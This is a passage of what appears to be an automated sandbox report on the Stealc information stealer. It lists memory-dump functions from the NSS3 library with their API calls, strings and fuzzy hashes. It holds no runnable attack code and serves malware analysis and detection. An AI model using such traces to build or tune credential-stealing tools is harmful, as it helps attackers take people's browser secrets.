                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3150690610-0
                                                                                                                                                                            • Opcode ID: 9c56de77ab74d59256afb25cebfe0ce5b3a722ce4ea80853eecde86bf5d7d1ba
                                                                                                                                                                            • Instruction ID: dc5419ce0b13cd447e9b533b701a9b7509d093b6dd80768f3500b69b5121e033
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c56de77ab74d59256afb25cebfe0ce5b3a722ce4ea80853eecde86bf5d7d1ba
                                                                                                                                                                            • Instruction Fuzzy Hash: AC21E7B5D042049FDB10AF68ED41AEEB7B4EF19318F540439E90AA7700EB31E954CBD1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C925B40: PR_GetIdentitiesLayer.NSS3 ref: 6C925B56
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C923D3F
                                                                                                                                                                              • Part of subcall function 6C89BA90: PORT_NewArena_Util.NSS3(00000800,6C923CAF,?), ref: 6C89BABF
                                                                                                                                                                              • Part of subcall function 6C89BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C923CAF,?), ref: 6C89BAD5
                                                                                                                                                                              • Part of subcall function 6C89BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C923CAF,?), ref: 6C89BB08
                                                                                                                                                                              • Part of subcall function 6C89BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C923CAF,?), ref: 6C89BB1A
                                                                                                                                                                              • Part of subcall function 6C89BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C923CAF,?), ref: 6C89BB3B
                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6C923CCB
                                                                                                                                                                              • Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590AB
                                                                                                                                                                              • Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590C9
                                                                                                                                                                              • Part of subcall function 6C959090: EnterCriticalSection.KERNEL32 ref: 6C9590E5
                                                                                                                                                                              • Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C959116
                                                                                                                                                                              • Part of subcall function 6C959090: LeaveCriticalSection.KERNEL32 ref: 6C95913F
                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6C923CE2
                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C923CF8
                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6C923D15
                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6C923D2E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4030862364-0
                                                                                                                                                                            • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                            • Instruction ID: bb797e59a1b085d879081c3cba19b9fbb928907d37d45fd96e8bfe6177bc8204
                                                                                                                                                                            • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                            • Instruction Fuzzy Hash: 911108B56216006FE7209E79EC417ABB2ECBB21308F500534E59A87B24E736E82DC652
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C8EFE08
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
                                                                                                                                                                              • Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C8EFE1D
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F116E
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C8EFE29
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C8EFE3D
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C8EFE62
                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?), ref: 6C8EFE6F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 660648399-0
                                                                                                                                                                            • Opcode ID: 6ec8752f1191e1fcdbaabd8faa8c5bb1b8ec90f93d47f9b5fddc114ed8c2246a
                                                                                                                                                                            • Instruction ID: 2187d9adac48426c8653f4c2bc6f677619178d787008b2cec72fd95d85da743d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ec8752f1191e1fcdbaabd8faa8c5bb1b8ec90f93d47f9b5fddc114ed8c2246a
                                                                                                                                                                            • Instruction Fuzzy Hash: 67110CB66002066BEB204F58FD40E5B7398AF6D299F148434ED2C9BB52E731F914C791
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_Lock.NSS3 ref: 6C99FD9E
                                                                                                                                                                              • Part of subcall function 6C959BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C881A48), ref: 6C959BB3
                                                                                                                                                                              • Part of subcall function 6C959BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C881A48), ref: 6C959BC8
                                                                                                                                                                            • PR_WaitCondVar.NSS3(000000FF), ref: 6C99FDB9
                                                                                                                                                                              • Part of subcall function 6C87A900: TlsGetValue.KERNEL32(00000000,?,6C9F14E4,?,6C814DD9), ref: 6C87A90F
                                                                                                                                                                              • Part of subcall function 6C87A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C87A94F
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C99FDD4
                                                                                                                                                                            • PR_Lock.NSS3 ref: 6C99FDF2
                                                                                                                                                                            • PR_NotifyAllCondVar.NSS3 ref: 6C99FE0D
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C99FE23
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3365241057-0
                                                                                                                                                                            • Opcode ID: cfbcda9ffc74633ec5a73a08da6d60d8bc12c9789824c7ec673ffd3f04853d2f
                                                                                                                                                                            • Instruction ID: f7fdce74dacd948e25a29bb828a8c3009d8be719da7f1c74871892ac8c3372fd
                                                                                                                                                                            • Opcode Fuzzy Hash: cfbcda9ffc74633ec5a73a08da6d60d8bc12c9789824c7ec673ffd3f04853d2f
                                                                                                                                                                            • Instruction Fuzzy Hash: 34018EF6A046019BDF158F55FC008457B21AB6226C7294374E83A47BA1E722E929C7C1
                                                                                                                                                                            APIs
                                                                                                                                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C87AFDA
                                                                                                                                                                            Strings
                                                                                                                                                                            • unable to delete/modify collation sequence due to active statements, xrefs: 6C87AF5C
                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6C87AFD3
                                                                                                                                                                            • misuse, xrefs: 6C87AFCE
                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C87AFC4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                            • API String ID: 632333372-924978290
                                                                                                                                                                            • Opcode ID: 53f5c66824ba8544ec0468b321a1ff4080a2b1c75224a9964bbe09c858af968c
                                                                                                                                                                            • Instruction ID: adf269e8a5672b81b316502c7451706a135127a205ab8072d4562f9cecede8b4
                                                                                                                                                                            • Opcode Fuzzy Hash: 53f5c66824ba8544ec0468b321a1ff4080a2b1c75224a9964bbe09c858af968c
                                                                                                                                                                            • Instruction Fuzzy Hash: F991D275A042158FDB24CF59C994AEEB7F1AF45314F1948A8E865AB791E334EC01CB70
                                                                                                                                                                            APIs
                                                                                                                                                                            • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C8DFC55
                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C8DFCB2
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C8DFDB7
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C8DFDDE
                                                                                                                                                                              • Part of subcall function 6C8E8800: TlsGetValue.KERNEL32(?,6C8F085A,00000000,?,6C898369,?), ref: 6C8E8821
                                                                                                                                                                              • Part of subcall function 6C8E8800: TlsGetValue.KERNEL32(?,?,6C8F085A,00000000,?,6C898369,?), ref: 6C8E883D
                                                                                                                                                                              • Part of subcall function 6C8E8800: EnterCriticalSection.KERNEL32(?,?,?,6C8F085A,00000000,?,6C898369,?), ref: 6C8E8856
                                                                                                                                                                              • Part of subcall function 6C8E8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C8E8887
                                                                                                                                                                              • Part of subcall function 6C8E8800: PR_Unlock.NSS3(?,?,?,?,6C8F085A,00000000,?,6C898369,?), ref: 6C8E8899
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                            • String ID: pkcs11:
                                                                                                                                                                            • API String ID: 362709927-2446828420
                                                                                                                                                                            • Opcode ID: 724dd22caf1fb653aa5ed458e1cd1f56ac7a0f99bceb764a1c118a8efc513394
                                                                                                                                                                            • Instruction ID: 8d1f5ac853734f1e39f665296730900b3f14c47ca22f059d6da0dc408536a578
                                                                                                                                                                            • Opcode Fuzzy Hash: 724dd22caf1fb653aa5ed458e1cd1f56ac7a0f99bceb764a1c118a8efc513394
                                                                                                                                                                            • Instruction Fuzzy Hash: 995104B1A041719BEB308F28AF40B5A3375AF65359F270825DD089BB41EB30F914EB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcmp.VCRUNTIME140(00000000,?,?), ref: 6C81BE02
                                                                                                                                                                              • Part of subcall function 6C949C40: memcmp.VCRUNTIME140(?,00000000,6C81C52B), ref: 6C949D53
                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C81BE9F
                                                                                                                                                                            Strings
                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6C81BE98
                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C81BE89
                                                                                                                                                                            • database corruption, xrefs: 6C81BE93
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcmp$sqlite3_log
                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                            • API String ID: 1135338897-598938438
                                                                                                                                                                            • Opcode ID: 3646ae07785b3b0a84919e80552237d1b5284922df8294e851df26f9e8735839
                                                                                                                                                                            • Instruction ID: 44b65519c8a2b472cabc444bebd39a84a81f9f1de1c88238144686ae505eb53b
                                                                                                                                                                            • Opcode Fuzzy Hash: 3646ae07785b3b0a84919e80552237d1b5284922df8294e851df26f9e8735839
                                                                                                                                                                            • Instruction Fuzzy Hash: A23134B1A4C25A8BC720CF69CAD4ABBBBF1AF41314B098994EA485BF41D331EC04C7D1
                                                                                                                                                                            APIs
                                                                                                                                                                            • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C880BDE), ref: 6C880DCB
                                                                                                                                                                            • strrchr.VCRUNTIME140(00000000,0000005C,?,6C880BDE), ref: 6C880DEA
                                                                                                                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C880BDE), ref: 6C880DFC
                                                                                                                                                                            • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C880BDE), ref: 6C880E32
                                                                                                                                                                            Strings
                                                                                                                                                                            • %s incr => %d (find lib), xrefs: 6C880E2D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: strrchr$Print_stricmp
                                                                                                                                                                            • String ID: %s incr => %d (find lib)
                                                                                                                                                                            • API String ID: 97259331-2309350800
                                                                                                                                                                            • Opcode ID: 6b7fd339021b6988a23b82113a40718751a31ec5961487d64aba599e93bc5404
                                                                                                                                                                            • Instruction ID: 6b5e4f852e4e6aba65a64edfb9f0194adcc24e370929ef7f5e0d55a71878d4c1
                                                                                                                                                                            • Opcode Fuzzy Hash: 6b7fd339021b6988a23b82113a40718751a31ec5961487d64aba599e93bc5404
                                                                                                                                                                            • Instruction Fuzzy Hash: 48012472702614AFEB208F64EC49E17B3ACEF45A0AB15482DE909D3A41E761FC1486E1
                                                                                                                                                                            APIs
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C829CF2
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6C829D45
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C829D8B
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6C829DDE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3168844106-0
                                                                                                                                                                            • Opcode ID: a90b23c899052a2ede94830af132ec1bad5d6f16338873d17a8d7e82b389aa2f
                                                                                                                                                                            • Instruction ID: 15217205369977b5bf19f2442a9bcd7b06715f181dce16a5bb270a9a3b7424a0
                                                                                                                                                                            • Opcode Fuzzy Hash: a90b23c899052a2ede94830af132ec1bad5d6f16338873d17a8d7e82b389aa2f
                                                                                                                                                                            • Instruction Fuzzy Hash: 2EA18E7170C200CBEB68AF28EA8D77A3775AF4B315F28092DD41647A44DB3D9985CBC2
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C93DD8C
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DE1B
                                                                                                                                                                            • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C93DE77
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2700453212-0
                                                                                                                                                                            • Opcode ID: 06b1dc23b4faed387f7243178022a1441a44f4b42f85bbb0f7d398d41fa46cc9
                                                                                                                                                                            • Instruction ID: 48f5f7822fc4840fa4dc938573ef1e7cff6d3a14717d3e12f6c82141cf50afcb
                                                                                                                                                                            • Opcode Fuzzy Hash: 06b1dc23b4faed387f7243178022a1441a44f4b42f85bbb0f7d398d41fa46cc9
                                                                                                                                                                            • Instruction Fuzzy Hash: 53717772A14324CFDB20CF9AC9D068ABBB8BF59718F25916DD8596B742D770E901CF80
                                                                                                                                                                            APIs
                                                                                                                                                                            • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6C8BBF06
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8BBF56
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,?,?,6C899F71,?,?,00000000), ref: 6C8BBF7F
                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6C8BBFA9
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8BC014
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Item_Util$Zfree$CertificateDestroyEncodeError
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3689625208-0
                                                                                                                                                                            • Opcode ID: 2e58f5bf21ff5a647358c6a6138307a8f7e8dd942602a8976c5237397e4004bc
                                                                                                                                                                            • Instruction ID: 4d68b15fc95f6fad956da17467ec3a62287a4165a5e1fc242be817e69d54420b
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e58f5bf21ff5a647358c6a6138307a8f7e8dd942602a8976c5237397e4004bc
                                                                                                                                                                            • Instruction Fuzzy Hash: 0941E571A016059BEB20CE6ADE80BBB77B9AF45208F104938E819F7B41FB31D905CBD1
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C88EDFD
                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000000), ref: 6C88EE64
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C88EECC
